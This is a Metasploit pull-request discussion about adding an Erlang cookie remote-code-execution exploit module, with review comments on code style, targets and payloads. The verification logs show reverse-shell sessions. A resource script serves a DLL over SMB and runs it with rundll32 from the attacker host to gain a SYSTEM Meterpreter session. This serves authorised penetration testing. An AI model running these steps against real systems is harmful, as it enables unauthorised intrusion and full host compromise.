Erlang cookie rce exploit module
rapid7/metasploit-framework pull request #11089
Opened 2018-12-09 06:24 UTC by wetw0rk

## Erlang Port Mapper Daemon Cookie RCE

The erlang port mapper daemon is used to coordinate distributed erlang instances. Should an attacker get the authentication cookie RCE is trivial. Usually, this cookie is named ".erlang.cookie" and varies on location.

## Verification

This exploit was tested on a fresh `Ubuntu 16.04.5 LTS`, however it should work on any Linux/Unix system.

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/erlang_cookie_rce`
- [ ] `set COOKIE EXAMPLE`
- [ ] `set RHOST 127.0.0.1`
- [ ] `set RPORT 25672`
- [ ] `exploit`
```
msf exploit(unix/erlang_cookie_rce) > exploit 

[*] Started reverse TCP double handler on 192.168.245.146:4444 
[*] A.B.C.D:25672 - Receiving server challenge
[*] A.B.C.D:25672 - MD5 digest generated: c8cf8d1d4a1416023a27405c30e0d38f
[*] A.B.C.D:25672 - Sending challenge reply
[*] A.B.C.D:25672 - Challenge sent, sending payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Pj98zUYj3ZxLHfZl;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Pj98zUYj3ZxLHfZl\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (W.X.Y.Z:4444 -> A.B.C.D:50026) at 2018-12-08 22:41:00 -0600

id
uid=122(rabbitmq) gid=130(rabbitmq) groups=130(rabbitmq)
```

2018-12-09 06:35 UTC, OJ commented
This should work on Windows as well (but test to be sure). And hence, doesn't belong in the `unix` namespace, please use `multi`.

2018-12-09 07:01 UTC, bcoles commented on modules/exploits/multi/erlang_cookie_rce.rb
> +    hash.update datastore['COOKIE']
Is there a way to check whether the server accepts to the `COOKIE` as valid?

2018-12-09 07:01 UTC, bcoles commented on modules/exploits/multi/erlang_cookie_rce.rb
> +require 'digest'
This shouldn't be necessary, but I could be wrong.

2018-12-09 07:16 UTC, wetw0rk commented on modules/exploits/multi/erlang_cookie_rce.rb
> +    our_node = "#{rand_text_alphanumeric(6)}@#{rand_text_alphanumeric(7)}"
No it's not it can be any length it's just calculated using the "Tag Byte, Version bytes, and Flag Bytes". Should be able to change this :smile:

2018-12-09 07:19 UTC, wetw0rk commented on modules/exploits/multi/erlang_cookie_rce.rb
> +    send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00\x0e"
Yeah it has to do with the control message when making the call. Double checked just now in Wireshark.

2018-12-09 07:20 UTC, wetw0rk commented on modules/exploits/multi/erlang_cookie_rce.rb
> +    send << payload.raw
It's running a command such as "whoami", I'm not sure but I can try

2018-12-09 07:34 UTC, bcoles commented on modules/exploits/multi/erlang_cookie_rce.rb
> +require 'digest'
I disagree. I just tried locally in a test module and the `generate_challenge_digest` method appeared to work fine.

I tested from a local exploit module context, rather than remote exploit, but the imported libraries for local exploits and remote exploits should be very similar.

2018-12-09 07:41 UTC, wetw0rk commented on modules/exploits/multi/erlang_cookie_rce.rb
> +require 'digest'
Alright, I'll try to use it sorry my ruby is horrible if not non-existent :joy:

2018-12-09 13:58 UTC, h00die commented
Please add documentation, see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md

2018-12-09 21:07 UTC, wetw0rk commented
Let me know what you guy's think of the changes made. @OJ you were right it works on a windows install however I can't get the powershell base64 encoded payload to execute :thinking: any thoughts?

- Node length has been made dynamic as helped by @bcoles 
- Could not get encoded payloads to work (maybe I'm doing something wrong?)
- 'user' string unchanged apart from neater organization
- COOKIE check was made (server returns NULL if incorrect)
- Removed 'digest'

I also added documentation as requested :smile:

2018-12-09 21:49 UTC, OJ requested changes

2018-12-09 21:49 UTC, OJ commented on modules/exploits/multi/erlang_cookie_rce.rb
> +            'PAYLOAD' => 'cmd/unix/reverse',
Should there be a default payload given we don't know the OS of the target?

2018-12-09 21:49 UTC, OJ commented on modules/exploits/multi/erlang_cookie_rce.rb
> +    hash.update datastore['COOKIE']
Parameters to function calls should be surrounded by parenthesis:
`hash.update(datastore['COOKIE'])`
There are other cases in the module that'll need updating as well.

2018-12-09 21:49 UTC, OJ commented on modules/exploits/multi/erlang_cookie_rce.rb
> +        'DisclosureDate' => 'Oct 5, 2017',
Given that Erlang has had this feature by design since it first supported distribution, it doesn't make sense (IMHO) to claim that this was "discovered" last year just because it was blogged about in the security community. I personally feel this should be left blank.

2018-12-09 21:50 UTC, OJ commented
Maybe it's due to payload length on the command line? Which Windows payload are you trying?

2018-12-09 21:58 UTC, wetw0rk commented
> Maybe it's due to payload length on the command line? Which Windows payload are you trying?

2018-12-09 22:02 UTC, OJ approved these changes

2018-12-09 22:08 UTC, wetw0rk commented
> Maybe it's due to payload length on the command line? Which Windows payload are you trying?

I tried using `cmd/windows/powershell_reverse_tcp`, as well as incorporating the cmd/powershell_base64 encoder. I don't think it's the length I think it may be the quotation marks and lack of escapes or something.

2018-12-10 00:47 UTC, wetw0rk commented on modules/exploits/multi/erlang_cookie_rce.rb
> +        'DisclosureDate' => 'Oct 5, 2017',
Does it matter that the "Travis CI build" failed the check since it has no disclosure date?

2018-12-10 00:59 UTC, bcoles commented on modules/exploits/multi/erlang_cookie_rce.rb
> +        'DisclosureDate' => 'Oct 5, 2017',
Yes, the `DisclosureDate` field is mandatory.

In instances like this, where the module takes advantage of intended functionality, the `DisclosureDate` is usually set to the date the relevant functionality was added to the software.

2018-12-10 01:08 UTC, OJ commented on modules/exploits/multi/erlang_cookie_rce.rb
> +        'DisclosureDate' => 'Oct 5, 2017',
Ugh. Good luck digging that up! This is a perfect example of why this field shouldn't be mandatory.

2018-12-10 01:33 UTC, wetw0rk commented on modules/exploits/multi/erlang_cookie_rce.rb
> +        'DisclosureDate' => 'Oct 5, 2017',
No worries haha just pushed it, got it from the github source code history. Although the code has a license since 1997 "os.erl" seemed to be introduced / released in 09.

2018-12-10 01:37 UTC, wetw0rk commented on modules/exploits/multi/erlang_cookie_rce.rb
> +    hash.update datastore['COOKIE']
😂

2018-12-10 01:54 UTC, bcoles commented on modules/exploits/multi/erlang_cookie_rce.rb
> +    hash.update datastore['COOKIE']
Seems OJ is unhappy today. Does the MSF CoC allow virtual hugs?

2018-12-12 20:38 UTC, acammack-r7 commented
I would prefer that the protocol chunks were documented better, with each term labeled for what it does. The Erlang documentation on the subject is pretty comprehensive, and the BERT project can help test out individual items.

http://erlang.org/doc/apps/erts/erl_dist_protocol.html
http://erlang.org/doc/apps/erts/erl_ext_dist.html
https://github.com/mojombo/bert

2018-12-13 16:57 UTC, wetw0rk commented
> I would prefer that the protocol chunks were documented better, with each term labeled for what it does. The Erlang documentation on the subject is pretty comprehensive, and the BERT project can help test out individual items.
> 
> http://erlang.org/doc/apps/erts/erl_dist_protocol.html
> http://erlang.org/doc/apps/erts/erl_ext_dist.html
> https://github.com/mojombo/bert

Went ahead and added the appropriate comments to the packets being sent. Let me know what you think.

2018-12-13 17:20 UTC, acammack-r7 commented
This is much better, thanks! It will help a lot if we ever need to update it or run into a bug.

2018-12-13 19:50 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2018-12-18 13:46 UTC, jrobles-r7 commented on modules/exploits/multi/misc/erlang_cookie_rce.rb
> +        'Targets'        => [[ 'Automatic Target', {} ]],
Adding a separate `Windows` and `Unix` target would be helpful for setting a default payload that is known to work for each platform. Here are a couple of examples:
[Weblogic Module](https://github.com/jrobles-r7/metasploit-framework/blob/3161beff69eee10ea33a9e0c198955bbcddc4954/modules/exploits/multi/misc/weblogic_deserialize.rb#L35)
[Axis Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/axis_srv_parhand_rce.rb#L43)

2018-12-18 17:37 UTC, wetw0rk commented on modules/exploits/multi/misc/erlang_cookie_rce.rb
> +        'Targets'        => [[ 'Automatic Target', {} ]],
Yeah that's a great idea, is there a way to run a post exploitation or another exploit script as well? For example on windows: an SMB server serving the payload. I added a snippet for an idea of what I would like to do.

```
msf > resource exploit.rc 
[*] Processing /root/exploit.rc for ERB directives.
resource (/root/exploit.rc)> use exploit/windows/smb/smb_delivery
resource (/root/exploit.rc)> set SHARE MSF
SHARE => MSF
resource (/root/exploit.rc)> set TARGET 0
TARGET => 0
resource (/root/exploit.rc)> exploit -j
[*] Exploit running as background job 0.
resource (/root/exploit.rc)> use exploit/multi/erlang_cookie_rce
resource (/root/exploit.rc)> set COOKIE MOLKLGXHWQLTGUREBDKI

[*] Started reverse TCP handler on 192.168.245.146:4444 
COOKIE => MOLKLGXHWQLTGUREBDKI
resource (/root/exploit.rc)> set RHOST 192.168.245.140
RHOST => 192.168.245.140
resource (/root/exploit.rc)> set PAYLOAD cmd/windows/generic
PAYLOAD => cmd/windows/generic
resource (/root/exploit.rc)> set CMD "rundll32.exe \\\\192.168.245.146\MSF\test.dll,0"
CMD => rundll32.exe \\192.168.245.146\MSF\test.dll,0
resource (/root/exploit.rc)> exploit -j
[*] Started service listener on 192.168.245.146:445 
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\192.168.245.146\MSF\test.dll,0
[*] Exploit running as background job 1.
msf exploit(multi/erlang_cookie_rce) > 
[*] 192.168.245.140:25672 - Receiving server challenge
[*] 192.168.245.140:25672 - Sending challenge reply
[+] 192.168.245.140:25672 - Authentication successful, sending payload
[*] Sending stage (179779 bytes) to 192.168.245.140
[*] Meterpreter session 1 opened (192.168.245.146:4444 -> 192.168.245.140:49792) at 2018-12-18 11:33:51 -0600

msf exploit(multi/erlang_cookie_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Since the powershell payload will fail, it's best to serve the payload like that.

2018-12-18 17:39 UTC, wetw0rk commented on modules/exploits/multi/misc/erlang_cookie_rce.rb
> +        'Targets'        => [[ 'Automatic Target', {} ]],
Yeah that's a great idea, is there a way to run a post exploitation or another exploit script as well? For example on windows: an SMB server serving the payload. I added a snippet for an idea of what I would like to do.

```
msf > resource exploit.rc 
[*] Processing /root/exploit.rc for ERB directives.
resource (/root/exploit.rc)> use exploit/windows/smb/smb_delivery
resource (/root/exploit.rc)> set SHARE MSF
SHARE => MSF
resource (/root/exploit.rc)> set TARGET 0
TARGET => 0
resource (/root/exploit.rc)> exploit -j
[*] Exploit running as background job 0.
resource (/root/exploit.rc)> use exploit/multi/erlang_cookie_rce
resource (/root/exploit.rc)> set COOKIE MOLKLGXHWQLTGUREBDKI

[*] Started reverse TCP handler on 192.168.245.146:4444 
COOKIE => <COOKIE>
resource (/root/exploit.rc)> set RHOST 192.168.245.140
RHOST => 192.168.245.140
resource (/root/exploit.rc)> set PAYLOAD cmd/windows/generic
PAYLOAD => cmd/windows/generic
resource (/root/exploit.rc)> set CMD "rundll32.exe \\\\192.168.245.146\MSF\test.dll,0"
CMD => rundll32.exe \\192.168.245.146\MSF\test.dll,0
resource (/root/exploit.rc)> exploit -j
[*] Started service listener on 192.168.245.146:445 
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\192.168.245.146\MSF\test.dll,0
[*] Exploit running as background job 1.
msf exploit(multi/erlang_cookie_rce) > 
[*] 192.168.245.140:25672 - Receiving server challenge
[*] 192.168.245.140:25672 - Sending challenge reply
[+] 192.168.245.140:25672 - Authentication successful, sending payload
[*] Sending stage (179779 bytes) to 192.168.245.140
[*] Meterpreter session 1 opened (192.168.245.146:4444 -> 192.168.245.140:49792) at 2018-12-18 11:33:51 -0600

msf exploit(multi/erlang_cookie_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Since the powershell payload will fail

2018-12-18 20:58 UTC, wetw0rk commented on modules/exploits/multi/misc/erlang_cookie_rce.rb
> +        'Targets'        => [[ 'Automatic Target', {} ]],
Went ahead and added targets and fixed the default payloads. For windows I set it to add a user, from there the tester can psexec etc. I also updated the documentation accordingly.

2018-12-18 21:03 UTC, wetw0rk commented on modules/exploits/multi/erlang_cookie_rce.rb
> +    send << payload.raw
Could not encode properly

2018-12-19 14:15 UTC, merged

2018-12-19 14:22 UTC, jrobles-r7 commented
## Release Notes

The `exploit/multi/misc/erlang_cookie_rce` module attempts to authenticate to an erlang port mapper daemon with a user provided cookie to run commands on a remote server.

2018-12-19 17:31 UTC, wetw0rk commented
cheers 🍻

2018-12-19 17:33 UTC, jrobles-r7 commented
@wetw0rk thanks for the contribution

2018-12-19 21:17 UTC, mubix commented
This is awesome! Nice work!

2018-12-20 02:04 UTC, wetw0rk commented
Thanks guys happy to contribute 😄 🎉